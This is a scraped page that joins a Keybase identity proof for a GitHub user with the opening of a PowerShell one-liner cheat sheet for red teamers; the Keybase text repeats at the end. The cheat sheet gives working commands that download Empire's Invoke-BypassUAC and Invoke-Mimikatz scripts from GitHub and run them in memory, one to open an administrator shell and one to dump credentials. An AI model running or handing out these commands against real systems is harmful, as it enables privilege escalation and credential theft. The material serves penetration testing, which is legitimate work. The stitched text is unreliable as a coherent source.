I hereby claim:
-
I am surbo on github.
-
I am surbo (https://keybase.io/surbo) on keybase.
-
I have a public key ASDZRIowcu4taeDIrBM6crSPAbaPmxb0zOk2cUyS5frb9go
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
I hereby claim:
I am surbo on github.
I am surbo (https://keybase.io/surbo) on keybase.
I have a public key ASDZRIowcu4taeDIrBM6crSPAbaPmxb0zOk2cUyS5frb9go